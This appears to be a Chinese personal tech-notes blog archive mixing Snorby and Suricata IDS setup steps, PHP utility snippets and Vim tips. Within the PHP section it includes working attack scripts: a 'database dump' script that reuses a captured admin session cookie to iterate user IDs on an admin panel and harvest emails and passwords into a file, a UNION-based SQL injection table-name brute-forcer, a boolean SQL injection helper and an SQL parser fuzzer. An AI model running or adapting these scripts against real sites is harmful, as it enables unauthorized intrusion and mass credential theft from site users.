月度归档:2016年12月

snorby mark

bundle exec rake snorby:setup

这一步时始终过不去。

No time_zone specified in snorby_config.yml; detected time_zone: US/Eastern
3dd9afd796731d9f406d9cec0088c86e90995d4024acb27fa8710c99a48c1f73e431b6d8957a8de011cad066565c19354c85c5700378efc75d9ca15de46ae2ee
[datamapper] Created database 'snorby'
rake aborted!
TypeError: no implicit conversion of Fixnum into String

看了几遍代码, 没问题,

偶然想到数据库密码为123456

原config/database.yml为:

snorby: &snorby
  adapter: mysql
  username: root
  password: 123456
  host: localhost

改为  密码加上双引号:

snorby: &snorby
  adapter: mysql
  username: root
  password: "123456"
  host: localhost

php mark

#php 日期转换成TZ格式

$time_tz_str = str_replace('+00:00', 'Z', gmdate('c', time()));
#2020-07-21T12:11:11Z

#trim 移除字符串

function strim($string,$removestring){
    if (!is_string($string) || !is_string($removestring)){
        return $string;
    }
    $result = preg_replace("/^{$removestring}|{$removestring}$/", "", $string);
    return $result;
}

#这样改strim会更好一点
function strim($string,$removestring=''){
    if (!is_string($string)){
        return $string;
    }
    if (!$removestring){
        return trim($string);
    }
    $result = preg_replace("/^{$removestring}|{$removestring}$/", "", $string);
    return $result;
}

#curl request

function curl_request($url,$post='',$cookie='', $returnCookie=0){
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)');
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($curl, CURLOPT_AUTOREFERER, 1);
    curl_setopt($curl, CURLOPT_REFERER, "http://XXX");
    if($post) {
        curl_setopt($curl, CURLOPT_POST, 1);
        //curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
    }
    if($cookie) {
        curl_setopt($curl, CURLOPT_COOKIE, $cookie);
    }
    curl_setopt($curl, CURLOPT_HEADER, $returnCookie);
    curl_setopt($curl, CURLOPT_TIMEOUT, 10);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 1);  //ssl 这两行代码是为了能走https的请求,http请求放着也没有影响
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); //ssl 这两行代码是为了能走https的请求,http请求放着也没有影响
    $data = curl_exec($curl);
    if (curl_errno($curl)) {
        return curl_error($curl);
    }
    curl_close($curl);
    if($returnCookie){
        list($header, $body) = explode("\r\n\r\n", $data, 2);
        preg_match_all("/Set\-Cookie:([^;]*);/", $header, $matches);
        $info['cookie']  = substr($matches[1][0], 1);
        $info['content'] = $body;
        return $info;
    }else{
        return $data;
    }
}

#php remove bom str

function str_remove_bom($str){
  $charset[1] = substr($str, 0, 1);
  $charset[2] = substr($str, 1, 1);
  $charset[3] = substr($str, 2, 1);
  if (ord($charset[1]) == 239 && ord($charset[2]) == 187 && ord($charset[3]) == 191) {
      $rest = substr($str, 3);
      return $rest;
  } else{
  	return $str;
  }
}

#php实现内存地址反转

function array_endtostart($hex){
	$a_tmp=str_split($hex,2);
	$result=array_reverse($a_tmp);
	$hexstr=join("",$result);
	return $hexstr;
}

#php 实现汇编中的pxor

function xortnew($a,$b){
	$a_tmp=str_split($a,2);
	$b_tmp=str_split($b,2);
	$result="";
	foreach($a_tmp as $key=>$value){
			$a_b=hex2bin($value);
			$b_b=hex2bin($b_tmp[$key]);
			$r = $a_b ^ $b_b;
			$result .=bin2hex($r);
	}
	
	return $result;
}
var_dump(xortnew("3e213b21343d3c3e00000002253a600c","0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c"));

#php 查找字符串与替换

function tapreplace($str){
    $newstr=preg_replace_callback("/(<pre.*<\/pre>)/s",function ($match){
        $text=preg_replace("/\t/","&nbsp;&nbsp;&nbsp;&nbsp;",$match[0]);
        $text=preg_replace("/&#39;/","'",$text);
        $text=preg_replace("/#/","#",$text);
        $text=preg_replace("/\"/",""",$text);
        $text=preg_replace("/'/","'",$text);
        return $text;
    },$str);
    return $newstr;
}

#dokuwiki在php7下报operator not supported for strings in 错

inc\lessc.inc.php

	public $importDir = '';
#改为
	public $importDir = array();

#CryptoJS 与php互通

#CryptoJS 中
#128位AES加密
var key = CryptoJS.lib.WordArray.random(16);
var iv =  CryptoJS.lib.WordArray.random(16);
var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv});
#php:
        $key_str = hex2bin('xxxxxxx');
        $iv_str = hex2bin('xxxxxxx');
        $str="xxxxx";
        $result =openssl_decrypt($str,'aes-128-cbc',$key_str,false,$iv_str);

#192 aes
var key = CryptoJS.lib.WordArray.random(24);
var iv =  CryptoJS.lib.WordArray.random(16);
var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv});
#php:
        $key_str = hex2bin('xxxxxxx');
        $iv_str = hex2bin('xxxxxxx');
        $str="xxxxx";
        $result =openssl_decrypt($str,'aes-192-cbc',$key_str,false,$iv_str);


#256 aes:

var key = CryptoJS.lib.WordArray.random(32);
var iv =  CryptoJS.lib.WordArray.random(16);
var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv});
#php:
        $key_str = hex2bin('xxxxxxx');
        $iv_str = hex2bin('xxxxxxx');
        $str="xxxxx";
        $result =openssl_decrypt($str,'aes-256-cbc',$key_str,false,$iv_str);

#php try catch warning

set_error_handler(function($errno, $errstr, $errfile, $errline, array $errcontext) {
    // error was suppressed with the @-operator
    if (0 === error_reporting()) {
        return false;
    }

    throw new ErrorException($errstr, 0, $errno, $errfile, $errline);
});


#然后直接try就可以了
        try{
            if (preg_match("/{$rule}/", $result['url'])) {
                $end['match']=1;
                $end['code_error']=0;
            }
            if ($result['code'] == 404) {
                $end['code_error']=1;
            }
        }catch (Exception $e){
            var_dump($rule);
        }

#数组对象转换

/**
 * 数组 转 对象
 *
 * @param array $arr 数组
 * @return object
 */
function array_to_object($arr)
{
    if (gettype($arr) != 'array')
    {
        return;
    }
    foreach ($arr as $k => $v)
    {
        if (gettype($v) == 'array' || gettype($v) == 'object')
        {
            $arr[$k] = (object)array_to_object($v);
        }
    }
 
    return (object)$arr;
}
 
/**
 * 对象 转 数组
 *
 * @param object $obj 对象
 * @return array
 */
function object_to_array($obj)
{
    $obj = (array)$obj;
    foreach ($obj as $k => $v)
    {
        if (gettype($v) == 'resource')
        {
            return;
        }
        if (gettype($v) == 'object' || gettype($v) == 'array')
        {
            $obj[$k] = (array)object_to_array($v);
        }
    }
 
    return $obj;
}

#一个无极限分类

function get_tree($result){
        $tree = array();
        foreach($result as $item){
            if(isset($result[$item['pid']])){
                $result[$item['pid']]['son'][] = &$result[$item['pro_id']];
            }else{
                $tree[] = &$result[$item['pro_id']];
            }
        }
        return $tree;

}

//生成无极限的数据

//用递归展示处理的数据
    function getviewdata($data,$level=0){
            foreach($data as $key=>$value){
                for($i=0;$i<=$level;$i++){
                    echo '&emsp;&emsp;';
                }
                echo $value['pro_name'];
                echo '<br>';
                if(!empty($value['son'])){
                    getviewdata($value['son'],$level+1);
                }
            }
    }
    getviewdata($xx);




#某脱库脚本

function getuidinfo($i){
sleep(0.5);
$url="http://www.xxx.cn/admin.php?s=/product/order/index/uid/{$i}";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/xxx (KHTML, like Gecko) Chrome/xxx Safari/xxx');
curl_setopt($ch, CURLOPT_REFERER,'http://www.xxx.cn/admin.php?s=/product/order/index/uid/24');
curl_setopt($ch, CURLOPT_COOKIE,'PHPSESSID=vhbnfht14o07cvrhnuq5ir6o77');
$output = curl_exec($ch);
curl_close($ch);
preg_match_all('/<tbody>.*<\/tbody>/ims',$output,$result);
if(!isset($result[0][0]) || !$result[0][0]){
return array();
}
$tmp_array= explode("\n",$result[0][0]);
if(!$tmp_array){
return array();
}

$result_out=array();
foreach ($tmp_array as $a_tmp){
$a_tmp = trim($a_tmp);
if(!preg_match('/^<td>\d+<\/td>/',$a_tmp)){
continue;
}

preg_match('#^<td>\d+</td><td>.*</td><td>(.*)</td><td>\d+\.\d+</td><td>[^<]*</td><td>[^<]*</td><td><a[^>]*>([^<]*)</a></td>#',$a_tmp,$a_result);
$result_out[]=$a_result[1];
$account_name = $a_result['2'];
}
if (!isset($account_name)){
return array();
}
$result_out=array_unique($result_out);

$return['email']=$account_name;
$return['pid']=$result_out;

return $return;
}


function getproduct($product_id){
sleep(0.5);
$url="http://www.xxx.cn/admin.php?s=/product/user/index&keyword={$product_id}";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/xxx (KHTML, like Gecko) Chrome/xxx Safari/xxx');
curl_setopt($ch, CURLOPT_REFERER,'http://www.xxx.cn/admin.php?s=/product/order/index/uid/24');
curl_setopt($ch, CURLOPT_COOKIE,'PHPSESSID=vhbnfht14o07cvrhnuq5ir6o77');
$output = curl_exec($ch);
curl_close($ch);
preg_match_all('/<tbody>.*<\/tbody>/ims',$output,$result);
if(!isset($result[0][0]) || !$result[0][0]){
return array();
}
$tmp_array= explode("\n",$result[0][0]);
if(!$tmp_array){
return array();
}
$result=array();
foreach ($tmp_array as $a_tmp){
$a_tmp = trim($a_tmp);
if(!preg_match('/^<td>\d+<\/td>/',$a_tmp)){
continue;
}

preg_match('#^<td>\d+</td><td><a[^>]*>[^<]*</a></td><td>[^<]*</td><td>([^<]*)</td>#',$a_tmp,$a_result);
$result=$a_result[1];
}
if(!$result){
return array();
}
return $result;

}

for($i=1;$i<32167;$i++){
$uidinfo = getuidinfo($i);
if(!$uidinfo){
continue;
}
echo $i."\n";
$strs = "uid:{$i} email:".$uidinfo['email'].":";
$pwd_tmp=array();
foreach($uidinfo['pid'] as $pid){
$pwd = getproduct($pid);
if(!$pwd){
continue;
}
$pwd_tmp[]=$pwd;
}
$pwd_tmp=array_unique($pwd_tmp);
$pwd_str =implode("|",$pwd_tmp);
$strs .=$pwd_str."\n";

file_put_contents("pwd.txt",$strs,8);
sleep(0.5);
}

#thinkphp路由模式

http://www.xxx.net/product/index/xxx/id/29192
=>
http://www.xxx.net/index.php?m=product&c=index&a=xxx&id=29192

#跑表名

set_time_limit(0);
$tables = file("tables");

foreach ($tables as $a_tables){
$a_tables = trim($a_tables);
$url = "http://www.xxx.net/product/index/xxx/id/29192) and 1=1 and 1=2 union select 29192,29192,29192,2,2,4,5,(select id from ss_{$a_tables} where id>1 limit 0,1 ),7,8,9,10,2 -- a";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch,CURLOPT_COOKIE,'PHPSESSID=ddk0k3c1q3a9nio7rl4fkihtf4');
$output = curl_exec($ch);
curl_close($ch);

$garbage = strstr($output, "exist");
if($garbage == false) 
{
echo $a_tables."<br>";
} 
sleep(2);

}

#inject

$i = $_GET['id'];
sleep(1);
$url = "http://xxx.xxx.net/xxx/index/xxx/id/29192) and 1={$i} --";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_COOKIE,'PHPSESSID=ddk0k3c1q3a9nio7rl4fkihtf4');
$output = curl_exec($ch);
curl_close($ch);
print_r($output);

#fuzz1

<?php
$con=mysqli_connect("localhost","root","123456","test"); 
if (mysqli_connect_errno($con)) 
{ 
   echo 111;
	exit;
} 


for($i=0;$i<255;$i++) {

	for($j=0;$j<255;$j++) {

$char_str = chr($i);
$charj_str = chr($j);
$strs = "select count(*) from `information_schema`{$char_str}{$charj_str}`SCHEMATA`";
$result=mysqli_query($con,$strs);
$posts = array();
while($row = @mysqli_fetch_array($result)) {
    $posts[] = $row;
} 
if(isset($posts[0]) && $posts[0][0]==10 ){
echo "<font color=red>aaaa</font>{$i}|{$j}<br>";
}


	}

}  


mysqli_close($con);

#毫秒

list($usec, $sec) = explode(" ", microtime());
$lusec = sprintf('%03d',$usec*1000);

suricata nat下部署

Mark:

实验环境:

最好两台真机,至少一台虚拟机一台真机,不推荐两台实验环境都为虚拟机(两台都是虚拟机时, route表中的可能不会生效)

A:172.20.8.42   IPS (功能)

B:172.20.8.8     pc

要求:   B  –>  A  –> inetner      B若访问的地址存在攻击行为,则阻断

A:

#安装suricata

apt-get install libpcre3 libpcre3-dbg libpcre3-dev build-essential autoconf automake libtool libpcap-dev libnet1-dev libyaml-0-2 libyaml-dev zlib1g zlib1g-dev libcap-ng-dev libcap-ng0 make libmagic-dev libjansson-dev libjansson4 pkg-config libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libnfnetlink0  #解决信赖
wget https://github.com/inliniac/suricata/archive/suricata-3.2.zip
unar suricata-3.2.zip
cd suricata-3.2
git clone https://github.com/OISF/libhtp.git  #suricata 信赖libhtp  放到suricata项目目录中
./configure --enable-nfqueue --enable-pfring --enable-hiredis --prefix=/usr --sysconfdir=/etc --localstatedir=/var
make
make install
make install-conf
make install-rules
ldconfig

#配置转发环境

echo 1 > /proc/sys/net/ipv4/ip_forward


#配置iptables

iptables -I INPUT -j NFQUEUE && iptables -I OUTPUT -j NFQUEUE &&iptables -I FORWARD -j NFQUEUE && iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j NFQUEUE   #若以ids模式运行,则把 NFQUEUE 换成 ACCEPT


iptables -t nat -A POSTROUTING -s 172.20.8.5 -j SNAT --to 172.20.8.42 #转发的源地址转换 ,作此步骤才能抓到数据包

ifconfig eth0 -promisc  #网卡混杂模式

#修改suricata配置

#suricata.yaml
HOME_NET: "![172.20.0.0/16]"  #HOME_NET 把外部地址当成目标为自己的就能匹配rules

#启动

suricata -c /etc/suricata/suricata.yaml -q 0

B:

把电脑的网关设置为 172.20.8.42  就行了

#测试注意

最好用浏览器测试:http://xxx.com/xxx.php?id=1 and 1=2 union select id from test where id=1      在/var/log/suricata/fast.log  文件出行记录表示成功

若用curl命令行测试  则应为  curl “http://xxx.com/xxx.php?id=1%20and%201=2%20union%20select%20id%20from%20test%20where%20id=1”  #命令行下不会自动把空格转义为%20   若不添加  suricata 识别不了 匹配不了rules

#更新

功能尽量装全

apt-get install libpcre3 libpcre3-dbg libpcre3-dev build-essential autoconf automake libtool libpcap-dev libnet1-dev libyaml-0-2 libyaml-dev zlib1g zlib1g-dev libcap-ng-dev libcap-ng0 make libmagic-dev libjansson-dev libjansson4 pkg-config libprelude-dev liblua5.1-dev libgeoip-dev libhiredis-dev libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libnfnetlink0


./configure --enable-nfqueue --enable-pfring --enable-hiredis --prefix=/usr --sysconfdir=/etc --localstatedir=/var --enable-unittests --enable-python --enable-debug --enable-debug-validation --enable-profiling --enable-profiling-locks --enable-lua --enable-geoip --enable-pie --enable-prelude 

另在NAT转发下会导致服务端丢失真实源ID,所以另拿一台机器做分析,用iptables做端口镜像(或者daemonlogger)

iptables -A INPUT -i eth0 -p tcp -m tcp --sport 80 -j TEE --gateway 172.20.8.147
iptables -A OUTPUT -o eth0 -p tcp -m tcp --dport 80 -j TEE --gateway 172.20.8.147

#注意,input output 都得镜像过来, 就像nat下不添加iptables的源地址转换,就相当于只有input,suricate 在此种情况下不进行protocol分析。

#若只镜像注入的流量,则在suricata.yaml文件中 不过功能会有BUG,建议镜像双向流量

--set stream.async-oneside=true

#另附suricata snort 一键安装脚本

apt-get install wkhtmltopdf gcc g++ build-essential libssl-dev libreadline6-dev zlib1g-dev libsqlite3-dev libxslt-dev libxml2-dev imagemagick git-core libmysqlclient-dev libmagickwand-dev default-jre ruby ruby-dev libpcre3 libpcre3-dbg libpcre3-dev build-essential autoconf automake libtool libpcap-dev libnet1-dev libyaml-0-2 libyaml-dev zlib1g zlib1g-dev libcap-ng-dev libcap-ng0 make libmagic-dev libjansson-dev libjansson4 pkg-config libprelude-dev liblua5.1-dev libgeoip-dev libhiredis-dev mysql-server apache2 apache2-dev libapr1-dev libaprutil1-dev libcurl4-openssl-dev libpcre3 libpcre3-dbg libpcre3-dev build-essential autoconf automake libtool libpcap-dev libnet1-dev libyaml-0-2 libyaml-dev zlib1g zlib1g-dev libcap-ng-dev libcap-ng0 make libmagic-dev git pkg-config libnss3-dev libnspr4-dev wget mysql-client libmysqlclient-dev libdumbnet-dev libmysqlclient18 flex bison libpq-dev postgresql-server-dev-all libdnet-dev unar



#install suricata begin
cd /tmp
wget https://github.com/inliniac/suricata/archive/suricata-3.2.zip
unar suricata-3.2.zip
cd suricata-suricata-3.2
git clone https://github.com/OISF/libhtp.git  #suricata 信赖libhtp  放到suricata项目目录中
./autogen.sh
./configure --enable-nfqueue --enable-pfring --enable-hiredis --prefix=/usr --sysconfdir=/etc --localstatedir=/var --enable-unittests --enable-python --enable-debug --enable-debug-validation --enable-profiling --enable-profiling-locks --enable-lua --enable-geoip --enable-pie --enable-prelude
make
make install
make install-conf
make install-rules
ldconfig

sed -i "s|windows: [0.0.0.0/0].*|#windows: [0.0.0.0/0]|g" /etc/suricata/suricata.yaml
perl -0777 -i -pe  "s/- unified2-alert:\s*enabled:.*/- unified2-alert:\n      enabled: yes/g" /etc/suricata/suricata.yaml


#install suricata end

#install snorby begin
gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
curl -sSL https://get.rvm.io | bash -s stable

source /etc/profile.d/rvm.sh

rvm install ruby-2.2.4
rvm use ruby-2.2.4 --default

gem sources --add https://gems.ruby-china.org/ --remove https://rubygems.org/

gem install thor i18n bundler tzinfo builder memcache-client rack rack-test erubis mail rack-mount rails sqlite3 arel ezprint rake activesupport minitest

bundle config mirror.https://rubygems.org https://gems.ruby-china.org

git clone http://github.com/Snorby/snorby.git --depth=1 /var/www/snorby
cp /var/www/snorby/config/database.yml.example /var/www/snorby/config/database.yml
cp /var/www/snorby/config/snorby_config.yml.example /var/www/snorby/config/snorby_config.yml
sed -i "s/password: .*\$/password: \"123456\"/" /var/www/snorby/config/database.yml
sed -i "s/domain: .*\$/domain: 'localhost:3000'/" /var/www/snorby/config/snorby_config.yml
sed -i "s/wkhtmltopdf: .*\$/wkhtmltopdf: wkhtmltopdf/" /var/www/snorby/config/snorby_config.yml
sed -i "s#rules:#rules: \n    - \"/etc/suricata/rules/\"#g" /var/www/snorby/config/snorby_config.yml


cd /var/www/snorby/ && bundle update activesupport railties rails
cd /var/www/snorby/ && bundle install
cd /var/www/snorby/ && bundle exec rake snorby:setup RAILS_ENV=production

chown www-data:www-data /var/www/snorby -R
cat <<EOT >> /etc/apache2/sites-available/snorby.conf
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/snorby/public

        <Directory "/var/www/snorby/public">
                AllowOverride all
                Order deny,allow
                Allow from all
                Options -MultiViews
        </Directory>

</VirtualHost>
EOT

a2dissite 000-default.conf
a2ensite snorby.conf

gem install --no-ri --no-rdoc passenger
cd /var/www/snorby/ && passenger-install-apache2-module -a 2> /tmp/.passenger_error.txt 1> /tmp/.passenger_compile_out
sed -n '/LoadModule passenger_module \/usr\//,/<\/IfModule>/p' /tmp/.passenger_compile_out > /etc/apache2/mods-available/passenger.load
a2enmod passenger 
a2enmod rewrite
service apache2 restart
cd /var/www/snorby/ && bundle pack
cd /var/www/snorby/ && bundle install --path vender/cache
service apache2 restart
#install snorby end

#install barnyard2 begin
cd /tmp
wget -q https://www.snort.org/downloads/snort/daq-2.0.6.tar.gz
if [ -d "/tmp/daq-2.0.6" ]; then
  rm -r /tmp/daq-2.0.6
fi
tar xzf daq-2.0.6.tar.gz
cd daq-2.0.6
./configure && make && make install

ln -s /usr/include/dumbnet.h /usr/include/dnet.h
cd /tmp/ && git clone https://github.com/firnsy/barnyard2 --depth=1
cd barnyard2
./autogen.sh
autoreconf --force --install
./configure --with-mysql --with-mysql-libraries=/usr/lib/x86_64-linux-gnu/
make && make install
cp /tmp/barnyard2/etc/barnyard2.conf /etc/suricata/
sed -i "s/#config interface:\s\+eth0/config interface:  eth0/g" /etc/suricata/barnyard2.conf
sed -i "s/#config daemon/config daemon/g" /etc/suricata/barnyard2.conf
sed -i "s/#config verbose/config verbose/g" /etc/suricata/barnyard2.conf
sed -i "s;#config waldo_file:.*;config waldo_file: /var/log/suricata/suricata.waldo;" /etc/suricata/barnyard2.conf
sed -i "s#config reference_file:\s\+/etc/.*#config reference_file:      /etc/suricata/reference.config#g" /etc/suricata/barnyard2.conf
sed -i "s#config classification_file:\s\+/etc/.*#config classification_file: /etc/suricata/classification.config#g" /etc/suricata/barnyard2.conf
sed -i "s#config gen_file:\s\+/etc/.*#config gen_file:            /etc/suricata/rules/gen-msg.map#g" /etc/suricata/barnyard2.conf
sed -i "s#config sid_file:\s\+/etc/.*#config sid_file:            /etc/suricata/rules/sid-msg.map#g" /etc/suricata/barnyard2.conf
echo "output database: log, mysql, user=root password=123456 dbname=snorby host=localhost sensor_name=sensor1" >> /etc/suricata/barnyard2.conf
mkdir /var/log/barnyard2
cat << 'EOT' >> /etc/init.d/barnyard2
#!/bin/sh
case $1 in
    start)
        echo "starting $0..."
        sudo barnyard2 -c /etc/suricata/barnyard2.conf -d /var/log/suricata -f unified2.alert -w /var/log/suricata/suricata.waldo
        echo -e 'done.'
    ;;
    stop)
        echo "stopping $0..."
        killall barnyard2
        echo -e 'done.'
    ;;
    restart)
        $0 stop
        $0 start
    ;;
    *)
        echo "usage: $0 (start|stop|restart)"
    ;;
esac

EOT

chmod 700 /etc/init.d/barnyard2
update-rc.d barnyard2 defaults 21 00
#install end begin


cd /var/www/snorby
bundle exec rake snorby:update RAILS_ENV=production


 


suricata -c /etc/suricata/suricata.yaml -i eth0 -D
barnyard2 -c /etc/suricata/barnyard2.conf -d /var/log/suricata -f unified2.alert -w /var/log/suricata/suricata.waldo -D




#开机启动snorby worker

source /etc/profile.d/rvm.sh
rvm use ruby-2.2.4 --default

cd /var/www/snorby
bundle exec rake snorby:update RAILS_ENV=production

#mark

VIM mark

#vim的搜索是否区分大小写

#大小写检索:默认是区分大小写的
:set ignorecase 或者 :set ic
#恢复区分大小写:
:set noignorecase 或者 :set noic

#vim中删除不包含关键字的行 刚好与g 命令相反

:g/pattern/d 是找到pattern, 删之
:v/pattern/d 是找到非pattern,删之

#vim中删除关键字的行

:g/xxxx/d
:g/^xxxx/d
:g/xxxx$/d

#修改默认 mouse=v

#文件位置:/usr/share/vim/vim81/defaults.vim
if has('mouse')
  set mouse=a
endif
#改为
if has('mouse')
  set mouse=v
endif

#AnsiEsc  终端高亮显示到VIM中(如ls grep等结果中的高亮)

#http://www.vim.org/scripts/script.php?script_id=4979  (新版本地址)
#https://github.com/powerman/vim-plugin-AnsiEsc (github)

wget http://www.vim.org/scripts/download_script.php?src_id=24019

vim AnsiEsc.vmb
:so %

test:
ls -al /etc --color=always > /tmp/a.txt && vim /tmp/a.txt

#编码切换

#先下载fencview.vim到plugin文件夹中
#~/.vim/vimrc 
"关闭自动检测
let g:fencview_autodetect=0
map <F2> :FencView<cr>